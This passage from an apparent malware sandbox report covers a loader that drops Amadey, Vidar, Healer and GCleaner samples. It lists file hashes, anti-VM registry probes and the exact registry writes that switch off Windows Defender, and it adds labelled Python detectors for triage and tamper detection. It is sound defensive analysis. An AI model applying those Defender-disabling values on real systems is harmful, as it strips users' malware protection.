
memory/1188-807-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-808-0x0000000000400000-0x0000000000860000-memory.dmp

memory/1644-809-0x0000000000910000-0x0000000001554000-memory.dmp

memory/2444-810-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2444-812-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1644-811-0x0000000000910000-0x0000000001554000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe

MD5 639af76cb7333cbd609da5d52a6e195b
SHA1 a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256 a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA512 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51

memory/2680-826-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2444-830-0x0000000010000000-0x000000001001C000-memory.dmp

memory/1228-834-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-836-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-837-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe

MD5 75dd7a91559a030b7c608e32474413d0
SHA1 a2f27e1caa02eda2e33577e530b9538b31ac6626
SHA256 d4ad9f72eb0ec01c9b73ad3a798c19496d639ab67dc963acf1cfc8e59b869f95
SHA512 a98b44e762d26050be8cd11fd2bc7609f8ac5cadf36bdb49b3c205ed30b1dfc2c77a59da6472a06766d629db0c283728bad6ff8a6d24a3c5dda6ba5b0888fdc5

memory/3492-855-0x0000000000360000-0x0000000000D98000-memory.dmp

memory/2680-854-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/624-858-0x0000000000400000-0x000000000042F000-memory.dmp

memory/3492-857-0x0000000000360000-0x0000000000D98000-memory.dmp

memory/2908-860-0x0000000000AA0000-0x0000000000DA8000-memory.dmp

memory/1228-863-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-864-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-871-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2680-877-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/1228-881-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-882-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-884-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2680-894-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/1188-902-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe

MD5 db3632ef37d9e27dfa2fd76f320540ca
SHA1 f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA256 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA512 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe

MD5 f071beebff0bcff843395dc61a8d53c8
SHA1 82444a2bba58b07cb8e74a28b4b0f715500749b2
SHA256 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA512 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

memory/880-961-0x0000000001080000-0x0000000001130000-memory.dmp
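A sandbox file table like the one above mixes real payloads with handles and cache entries that carry no content, and the hashes are the fastest way to sort them: skotes.exe has the same SHA256 as the submitted sample, so it is a self-copy rather than a new payload; \??\PIPE\srvsvc hashes as zero bytes (MD5 d41d8cd9..., SHA256 e3b0c442...) because it is a named pipe, not a file; service[1].htm hashes as the single byte "0" (MD5 cfcd2084..., SHA256 5feceb66...), i.e. the server answered with a one-character body; and inet.exe under 10000370101 appears twice with different hashes, so the path was rewritten during the run. The script below is an added example, not part of the report: it takes a subset of the table above (copied into DROPPED_FILES), computes the trivial-content hashes rather than hard-coding them, and returns those three findings. The function and variable names are mine.

```python
"""Triage a sandbox 'Files' table by hash: self-copies of the sample,
zero-payload artifacts, and paths written more than once.

Added example; not part of the sandbox report. Input rows are copied from
the report's Files table (path, MD5, SHA256); the drive letter is dropped
when comparing paths because the report lists the same file both as
'C:\\Users\\...' and '\\Users\\...'.
"""
import hashlib
from collections import defaultdict

SUBMITTED_SHA256 = "97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2"

# Constructed subset of the report's Files table: (path, md5, sha256).
DROPPED_FILES = [
    (r"\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe",
     "a3ec4b44e7677c12a76bf51f45480133",
     "97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2"),
    (r"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe",
     "515748a93ce7beb3f4416ec66ba8488e",
     "a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6"),
    (r"\??\PIPE\srvsvc",
     "d41d8cd98f00b204e9800998ecf8427e",
     "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\service[1].htm",
     "cfcd208495d565ef66e7dff9f98764da",
     "5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9"),
    (r"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe",
     "bd6a9d5ffd2bad77a792a14ab8f2775f",
     "f610afd2849e89b2b04d2bdca5b33211be65081e94a5207cc51e4e0cb1c0d498"),
    (r"\Users\Admin\AppData\Local\Temp\10000370101\inet.exe",
     "9d6f03d5a83f9ab0de52c69257720122",
     "ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6"),
]

# SHA256 of content that carries no payload. Computed here, not hard-coded,
# so the table can be extended with other known-trivial bodies.
TRIVIAL_CONTENT = {
    hashlib.sha256(b"").hexdigest(): "empty (0 bytes)",
    hashlib.sha256(b"0").hexdigest(): 'single byte "0"',
}


def normalize_path(path):
    """Lower-case and strip a leading drive letter so the two inet.exe rows
    compare as the same path."""
    p = path.lower()
    if len(p) > 2 and p[1] == ":":
        p = p[2:]
    return p


def triage_dropped_files(files, submitted_sha256):
    """Return {'self_copies': [path], 'trivial': {path: reason},
    'rewritten': {normalized_path: [sha256, ...]}}."""
    report = {"self_copies": [], "trivial": {}, "rewritten": {}}
    hashes_by_path = defaultdict(list)
    for path, _md5, sha256 in files:
        if sha256 == submitted_sha256:
            report["self_copies"].append(path)
        if sha256 in TRIVIAL_CONTENT:
            report["trivial"][path] = TRIVIAL_CONTENT[sha256]
        hashes_by_path[normalize_path(path)].append(sha256)
    # A path that appears with more than one distinct hash was overwritten
    # during the run (or the report lists two different drops of it).
    for path, hashes in hashes_by_path.items():
        if len(set(hashes)) > 1:
            report["rewritten"][path] = sorted(set(hashes))
    return report


if __name__ == "__main__":
    result = triage_dropped_files(DROPPED_FILES, SUBMITTED_SHA256)
    for section, entries in result.items():
        print(section)
        for entry in (entries.items() if isinstance(entries, dict) else entries):
            print("  ", entry)
```

The same triage applies to any report in this format: anything flagged trivial can be dropped from IOC lists (a zero-byte pipe handle or a one-character HTTP body is not a usable indicator), self-copies point at the persistence location rather than at a new family, and rewritten paths are where a second-stage fetch replaced a first one.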

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-24 13:24

Reported

2025-02-24 13:26

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer

Detects Healer an antivirus disabler dropper

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
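The four signature groups above are all writes from one Healer process, and each flips a single Defender control: DisableAntiSpyware turns the engine off, the Real-Time Protection values switch off each monitor individually, Features\TamperProtection = 0 removes the guard that would have blocked the other writes, and DisableNotifications hides the result from the user. The following added example (not part of the sandbox report) parses indicator lines in the report's own "Set value (int) <key> = "<value>" <process> N/A" shape and reports, per process, which protections were disabled. The WOW6432Node hop is stripped so the 32-bit and 64-bit views of the same policy compare equal. The last line of the sample input, gpupdate.exe writing DisableRealtimeMonitoring = 0, is constructed to show why the value and not only the key must be checked; the rule table and function names are mine.

```python
"""Flag Windows Defender policy tampering in sandbox registry events.

Added example; not part of the sandbox report. It reads indicator lines in
the report's 'Set value (int) <key> = "<v>" <process> N/A' format and maps
each write to the Defender control it disables.
"""
import re
from collections import defaultdict

# Constructed sample input: lines in the report's format. The final
# gpupdate.exe line is invented to show that a write restoring the
# protective value is not tampering even though the key matches.
SAMPLE_EVENTS = r"""
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0" C:\Windows\System32\gpupdate.exe N/A
"""

# Registry value -> (value that disables the protection, what it disables).
# Paths are relative to HKLM\SOFTWARE, lower-cased, WOW6432Node removed.
DEFENDER_POLICY = r"policies\microsoft\windows defender"
TAMPER_RULES = {
    DEFENDER_POLICY + r"\disableantispyware": (1, "antimalware engine disabled"),
    DEFENDER_POLICY + r"\real-time protection\disablerealtimemonitoring": (1, "real-time monitoring off"),
    DEFENDER_POLICY + r"\real-time protection\disablebehaviormonitoring": (1, "behavior monitoring off"),
    DEFENDER_POLICY + r"\real-time protection\disableioavprotection": (1, "download/attachment (IOAV) scanning off"),
    DEFENDER_POLICY + r"\real-time protection\disableonaccessprotection": (1, "on-access scanning off"),
    DEFENDER_POLICY + r"\real-time protection\disablescanonrealtimeenable": (1, "catch-up scan on re-enable off"),
    r"microsoft\windows defender\features\tamperprotection": (0, "Tamper Protection off"),
    r"policies\microsoft\windows defender security center\notifications\disablenotifications": (1, "Security Center notifications suppressed"),
}

SET_VALUE_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\.+?) = "(?P<value>[^"]*)" (?P<process>.+?)\s+N/A$'
)
HKLM_SOFTWARE_RE = re.compile(r"^\\registry\\machine\\software\\(?:wow6432node\\)?", re.IGNORECASE)


def normalize_key(key):
    """Drop the HKLM\\SOFTWARE[\\WOW6432Node] prefix and lower-case the rest so
    the 32-bit and 64-bit views of one policy key compare equal."""
    return HKLM_SOFTWARE_RE.sub("", key).lower()


def parse_set_value_events(text):
    """Yield (key, value, process) for each 'Set value' line. Other event
    kinds (Key created, Key opened, ...) carry no value and are skipped."""
    for line in text.splitlines():
        m = SET_VALUE_RE.match(line.strip())
        if m:
            yield m.group("key"), m.group("value"), m.group("process")


def detect_defender_tampering(text):
    """Return {process: [finding, ...]} for every write that sets a Defender
    control to its disabling value. A write that restores the protective
    value (DisableRealtimeMonitoring = 0) is not reported."""
    findings = defaultdict(list)
    for key, value, process in parse_set_value_events(text):
        rule = TAMPER_RULES.get(normalize_key(key))
        if rule is None:
            continue
        bad_value, meaning = rule
        try:
            written = int(value)
        except ValueError:
            continue  # not an integer policy value; nothing to compare
        if written == bad_value:
            name = key.rsplit("\\", 1)[-1]
            findings[process].append(f"{name}={written}: {meaning}")
    return dict(findings)


if __name__ == "__main__":
    for process, hits in detect_defender_tampering(SAMPLE_EVENTS).items():
        print(process)
        for hit in hits:
            print("  -", hit)
```

On a live host the same rule table can be applied to the values read back from HKLM\SOFTWARE\Policies\Microsoft\Windows Defender and HKLM\SOFTWARE\Microsoft\Windows Defender\Features; the parser is only needed for the sandbox's text export.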

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
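The two tables above (the VBOX__ ACPI table open and the SystemBiosVersion/VideoBiosVersion queries), together with the Software\Wine key opened later in this section, are each a weak signal on their own: legitimate software reads BIOS strings too. What makes the dropped executables stand out is that the same process performs several different probes. The following added example (not part of the sandbox report) parses "Key opened" and "Key value queried" lines in the report's format, classifies each key as one of three probe types, and ranks processes by how many distinct probe types they used. The explorer.exe line in the sample input is constructed to show a single benign BIOS query falling below the threshold; the probe table, threshold and function names are mine.

```python
"""Correlate anti-analysis registry probes per process in sandbox events.

Added example; not part of the sandbox report. It reads 'Key opened' and
'Key value queried' indicator lines in the report's format and scores each
process by the number of distinct probe types it performed.
"""
import re
from collections import defaultdict

# Constructed sample input: lines copied in the report's format, plus one
# invented explorer.exe line to show a lone benign BIOS query scoring low.
SAMPLE_EVENTS = r"""
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
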